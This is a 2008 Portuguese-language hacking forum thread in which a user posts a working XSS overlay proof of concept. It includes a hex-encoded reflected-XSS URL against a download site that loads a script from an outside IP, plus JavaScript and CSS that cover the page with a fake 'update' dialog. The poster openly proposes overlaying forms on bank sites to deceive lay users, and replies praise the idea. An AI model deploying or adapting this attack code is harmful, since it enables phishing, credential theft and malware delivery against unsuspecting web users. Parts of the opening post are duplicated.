Title: Usando overlay para fins maléficos
Post by: Mateus on 13 de July , 2008, 03:25:45 PM
Post by: Mateus on 13 de July , 2008, 03:25:45 PM
Boa tarde, escrevi esse post para compartilhar com vcs como se faz isso:
http://superdownloads.uol.com.br/busca/ ... 74_3E.html (http://superdownloads.uol.com.br/busca/_22_3E_3C_73_63_72_69_70_74_20_73_72_63_3D_22_68_74_74_70_3A_2F_2F_32_31_33_2E_33_2E_37_2E_31_31_31_2F_31_2F_31_2E_6A_73_22_3E_3C_2F_73_63_72_69_70_74_3E.html)
Eu sei.....inicialmente não parece muita coisa, mas.....se pensarem um pouco vão ver que tem todo o potencial do mundo ^^
Do mesmo modo que coloquei apenas uma foto de um dialogo que eu fiz(que só isso já seria o suficiente para pegar usuários s leigos e até alguns semi-leigos) no superdownloads poderia ter colocado um form em cima do layout do site da caixa ou de qualquer outro banco que esteja vuln à XSS.
A técnica permite que coloque-se código html "em cima" do site, assim deixando o layout inalterado e podendo posicionar o que quiser onde quiser :D
Então passei a desenvolver uma POC
O trabalho consiste em 3 arquivos 2 .js e 1 .css
Cheguei a isso: o codigo é auto-explicativo e está bem comentado
1.js(tem esse nome pra a url se for o caso ficar pequena na hora de usar):
Overlay.js:
fly.css:
/*
fly.css:
tendo duvidas estou aqui para sana-las
http://superdownloads.uol.com.br/busca/ ... 74_3E.html (http://superdownloads.uol.com.br/busca/_22_3E_3C_73_63_72_69_70_74_20_73_72_63_3D_22_68_74_74_70_3A_2F_2F_32_31_33_2E_33_2E_37_2E_31_31_31_2F_31_2F_31_2E_6A_73_22_3E_3C_2F_73_63_72_69_70_74_3E.html)
Eu sei.....inicialmente não parece muita coisa, mas.....se pensarem um pouco vão ver que tem todo o potencial do mundo ^^
Do mesmo modo que coloquei apenas uma foto de um dialogo que eu fiz(que só isso já seria o suficiente para pegar usuários s leigos e até alguns semi-leigos) no superdownloads poderia ter colocado um form em cima do layout do site da caixa ou de qualquer outro banco que esteja vuln à XSS.
A técnica permite que coloque-se código html "em cima" do site, assim deixando o layout inalterado e podendo posicionar o que quiser onde quiser :D
Então passei a desenvolver uma POC
O trabalho consiste em 3 arquivos 2 .js e 1 .css
Cheguei a isso: o codigo é auto-explicativo e está bem comentado
1.js(tem esse nome pra a url se for o caso ficar pequena na hora de usar):
Code Select
/*
1.js
Porta de entrada para o ataque, atacha a folha de estilos a pagina e inclui o script que operacionaliza o ataque.
*/
var place = ''; //local onde os arquivos estao hospedados, deixe assim enquanto estiver testando no proprio pc, quando hospedar em algum lugar insira a url da pasta onde hospedou os arquivos.
document.write('<link rel="stylesheet" type="text/css" href="'+place+'fly.css"><script type="text/javascript" src="'+place+'overlay.js"></script>'); //escreve o está descrito no cabecalho do arquivo.Overlay.js:
Code Select
/*
overlay.js
Arquivo que operacionaliza o overlay, escreve a div com o conteudo e a torna visivel.
*/
var place = ''; //local onde os arquivos estao hospedados, deixe assim enquanto estiver testando no proprio pc, quando hospedar em algum lugar insira a url da pasta onde hospedou os arquivos.
function overlay() {
el = document.getElementById("overlay"); //acha o elemento overlay atraves do nome no nosso caso overlay é a div com o html que queremos mostrar e que será escrita com o comando no fim desse script.
el.style.visibility = (el.style.visibility == "visible") ? "hidden" : "visible"; //se o elemento(nossa div) estiver escondido torne-o visivel e vice-versa
}
document.write('<div id="overlay"><div><a onClick="overlay()" href="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"><img alt="" src="'+place+'Atualizar.png" width="244" height="125" class="style1"></a></div></div>'); //escreve o conteudo do nosso "ataque".
overlay(); //executa a funcao overlayfly.css:
/*
fly.css:
Code Select
Folha de estilos essencial para o funcionamento da técnica, sua maior importancia é colocar nosa div na camada superior do site e centraliza-la=D
*/
body {
/* Deixa a tag html <body> sem margens, ocupando 100% do espaço na tela*/
height:100%;
margin:0;
padding:0;
}
#overlay {
visibility: hidden; /* Configura a div com nosso ataque como estando inicialmente invisivel*/
position: absolute;/* Cofigura a posição como absoluta */
left: 0px;
top: 0px;
width:100%;
height:100%;
z-index: 1000; /* Configura a posição da div no eixo z (o eixo de profundidade) é isso que faz a div aparecer sem alterar o layout do site, é como se existesse um site em cima do outro. */
text-align:center;
}
#overlay div {
margin: 150px auto; /* configura a distancia do topo da pagina e deixa as outras direções serem ajustadas automaticamente*/
border:none;
}
.style1 {
border:none; /* Evita que o firefox desenhe um borda atraves das imagens linkadas */
}
a {
outline: none; /* Evita que o firefox desenhe um borda atraves das imagens linkadas */
}tendo duvidas estou aqui para sana-las
Title: Re: Usando overlay para fins maléficos
Post by: wtfnicked on 14 de July , 2008, 06:04:56 AM
Post by: wtfnicked on 14 de July , 2008, 06:04:56 AM
Gostei sim ;)
Title: Re: Usando overlay para fins maléficos
Post by: branco on 14 de July , 2008, 11:32:17 AM
Post by: branco on 14 de July , 2008, 11:32:17 AM
rsrs parabens cara, bom vendo as voltas por cima...
até, continua injetando conhecimento hehe
até, continua injetando conhecimento hehe
Title: Re: Usando overlay para fins maléficos
Post by: abobre on 14 de July , 2008, 12:34:12 PM
Post by: abobre on 14 de July , 2008, 12:34:12 PM
Gostei do seu tutorial cara, está bem explicado !
Parabéns e continue cooperando com o fórum !
Abraços
Parabéns e continue cooperando com o fórum !
Abraços
Title: Re: Usando overlay para fins maléficos
Post by: #phobia on 14 de July , 2008, 04:17:39 PM
Post by: #phobia on 14 de July , 2008, 04:17:39 PM
Demorei mas arrumei uma folguinha pra vir aqui neh Mateus! =p
Parabéns cara, muito bom sim além de criativo!!! xD
Bem explicado e eu tô ligado no trampo que tu teve...
Ponto positivo!
vlw!
Parabéns cara, muito bom sim além de criativo!!! xD
Bem explicado e eu tô ligado no trampo que tu teve...
Ponto positivo!
vlw!
Title: Re: Usando overlay para fins maléficos
Post by: Be.Cool on 15 de July , 2008, 07:34:14 PM
Post by: Be.Cool on 15 de July , 2008, 07:34:14 PM
Realmente muito legal o seu tutorial :D
E é verdade isso tem muito potencial!, imagine isso em um site de relacionamentos
já fico até triste só de pensar no que pode ser feito rsrsrs
Até +
E é verdade isso tem muito potencial!, imagine isso em um site de relacionamentos
já fico até triste só de pensar no que pode ser feito rsrsrs
Até +
Title: Re: Usando overlay para fins maléficos
Post by: #phobia on 15 de July , 2008, 08:16:19 PM
Post by: #phobia on 15 de July , 2008, 08:16:19 PM
Quote from: "Be.Cool"E é verdade isso tem muito potencial!, imagine isso em um site de relacionamentos :D
Cool²
Title: Re: Usando overlay para fins maléficos
Post by: share on 18 de April , 2009, 10:39:27 AM
Post by: share on 18 de April , 2009, 10:39:27 AM
Bom Tutorial!! xD.. :
Title: Re: Usando overlay para fins maléficos
Post by: Triplo X on 22 de April , 2009, 10:41:57 PM
Post by: Triplo X on 22 de April , 2009, 10:41:57 PM
vlw
copyright
copyright
Title: Re: Usando overlay para fins maléficos
Post by: samukt on 04 de September , 2009, 02:57:24 PM
Post by: samukt on 04 de September , 2009, 02:57:24 PM
Muito bom PARABéns!
Title: Re: Usando overlay para fins maléficos
Post by: anakim on 09 de September , 2009, 01:13:45 AM
Post by: anakim on 09 de September , 2009, 01:13:45 AM
mt bom
Title: Re:Usando overlay para fins maléficos
Post by: renatofidelis on 19 de April , 2010, 09:13:37 PM
Post by: renatofidelis on 19 de April , 2010, 09:13:37 PM
muito bom gostei vc é o cara ! 8)